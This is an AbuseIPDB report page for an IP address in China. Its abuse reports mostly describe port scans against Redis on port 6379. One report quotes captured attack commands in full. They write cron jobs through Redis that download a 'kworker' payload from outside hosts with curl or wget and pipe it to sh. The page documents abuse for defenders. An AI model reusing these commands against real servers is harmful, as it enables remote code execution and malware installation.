JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 116.129.255.248

116.129.255.248 was found in our database!

This IP was reported 18 times. Confidence of Abuse is 91%: ?

91%

ISP	China United Network Communications Corporation Limited
Usage Type	Fixed Line ISP
ASN	AS4837
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Changsha, Hunan

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 116.129.255.248

Whois 116.129.255.248

IP Abuse Reports for 116.129.255.248:

This IP address has been reported a total of 18 times from 17 distinct sources. 116.129.255.248 was first reported on June 5th 2026, and the most recent report was 3 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇨🇿 lp	2026-06-06 09:48:43 (3 days ago)	anomaly: tcp_port_scan, 501 > threshold 500, repeats 56067 times	Port Scan
🇨🇳 pengpeng	2026-06-06 08:04:11 (3 days ago)	monitor: on VM-0-7-ubuntu \| port: 6379 \| ttl: 251 script: github.com/sefinek/UFW-AbuseIPDB-Reporter	Port Scan
🇫🇮 Maxetow	2026-06-06 07:45:55 (3 days ago)	Scan port: 6379 \| 1 total \| size=60B	Port Scan
🇩🇪 genokrad	2026-06-06 06:59:11 (3 days ago)	Unauthorized connection attempt on TCP/6379 (Redis)	Port Scan
🇮🇳 Mr.Singh	2026-06-06 06:30:07 (3 days ago)	NFT blocked 116.129.255.248 on 06-Jun-2026..	Port Scan Brute-Force
🇬🇷 Xev	2026-06-06 06:01:14 (3 days ago)	Redis command execution Date: 2026-06-06 05:31:19 UTC Destination port: 6379 Executed commands: fl ... show more Redis command execution Date: 2026-06-06 05:31:19 UTC Destination port: 6379 Executed commands: flushall set backup1 /2 * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup4 /5 * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh config set dir /var/spool/cron/ config set dir /var/spool/cron/crontabs flushall set backup1 /2 * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup2 /3 * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker \| sh set backup3 /4 * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker \| sh set backup4 /5 * * * root wd1 -q -O- http://34.70.205.211... show less	IoT Targeted
🇩🇪 Yachiyo Runami	2026-06-06 05:46:59 (3 days ago)	Port Scan on Honeypot \| Ports: 6379/Redis \| Proto: TCP(1) \| Flags: all SYN \| TTL: 46 \| Len: 60B \| Wi ... show more Port Scan on Honeypot \| Ports: 6379/Redis \| Proto: TCP(1) \| Flags: all SYN \| TTL: 46 \| Len: 60B \| Win: 29200(1) \| F2B/ufw-honeypot@2026-06-06T05:46:59Z show less	Port Scan Hacking
🇩🇪 kingjan1999	2026-06-06 05:27:01 (3 days ago)	Blocked by UFW [6379/tcp] \| SPT: 63711 \| TTL: 43 \| LEN: 60 \| TOS: 0x00 • Reported by: github.com/sef ... show more Blocked by UFW [6379/tcp] \| SPT: 63711 \| TTL: 43 \| LEN: 60 \| TOS: 0x00 • Reported by: github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇩🇪 _ArminS_	2026-06-06 05:15:02 (3 days ago)	SP-Scan 36178:6379 detected 2026.06.06 07:15:02 blocked until 2026.07.26 00:17:49	Port Scan
🇵🇱 Yachiyo Runami	2026-06-06 04:48:56 (3 days ago)	Port Scan on Honeypot \| Ports: 6379/Redis \| Proto: TCP(1) \| Flags: all SYN \| TTL: 46 \| Len: 60B \| Wi ... show more Port Scan on Honeypot \| Ports: 6379/Redis \| Proto: TCP(1) \| Flags: all SYN \| TTL: 46 \| Len: 60B \| Win: 29200(1) \| F2B/ufw-honeypot@2026-06-06T04:48:55Z show less	Port Scan Hacking
🇨🇦 DRI	2026-06-06 04:37:08 (3 days ago)	Unsolicited TCP traffic on Honeypot, srcport=20072 dstport=6379	Port Scan Hacking
Anonymous	2026-06-06 03:50:57 (3 days ago)	2026-06-06T04:50:55.998180+01:00 vps kernel: [42458020.633896] [PORTSCAN DETECTED] IN=ens3 OUT= MAC= ... show more 2026-06-06T04:50:55.998180+01:00 vps kernel: [42458020.633896] [PORTSCAN DETECTED] IN=ens3 OUT= MAC=fa:16:3e:66:f6:24:02:37:19:0d:c2:f3:08:00 SRC=116.129.255.248 DST=54.37.14.118 LEN=60 TOS=0x00 PREC=0x00 TTL=41 ID=60753 DF PROTO=TCP SPT=60905 DPT=6379 WINDOW=29200 RES=0x00 SYN URGP=0 ... show less	Port Scan Brute-Force
🇫🇷 Elysium Security	2026-06-06 01:14:50 (3 days ago)	Mass port scanning on a whole network	Port Scan
🇳🇱 COMPLEX	2026-06-06 01:05:24 (3 days ago)	Unsolicited TCP traffic \| Action: DROP \| Port 6379	Brute-Force
🇳🇵 radheykrishna.com.np	2026-06-06 00:45:02 (3 days ago)	Jun 6 06:30:01 kernel: [4196512.316504] [UFW BLOCK] IN=ens160 OUT= SRC=116.129.255.248 LEN=60 TOS=0 ... show more Jun 6 06:30:01 kernel: [4196512.316504] [UFW BLOCK] IN=ens160 OUT= SRC=116.129.255.248 LEN=60 TOS=0x00 PREC=0x00 TTL=44 ID=14235 DF PROTO=TCP SPT=23566 DPT=6379 WINDOW=29200 RES=0x00 SYN URGP=0 ... show less	Port Scan

Showing 1 to 15 of 18 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇳🇱 46.151.178.13

🇱🇹 45.227.254.170

🇧🇷 205.210.31.239

🇺🇸 150.107.36.249

🇺🇸 104.254.246.129

🇬🇷 83.235.109.47

🇪🇸 34.175.173.37

🇵🇭 27.110.166.67

🇫🇷 5.35.243.192

🇳🇱 195.178.110.30

🇺🇸 172.56.79.231

🇧🇷 118.26.105.144

🇨🇦 99.252.156.168

🇮🇹 51.179.64.203

🇸🇦 50.60.231.210

🇲🇾 49.124.133.224

🇸🇬 47.245.96.46

🇵🇱 151.248.33.129

🇺🇸 66.132.224.231

🇺🇸 52.238.197.190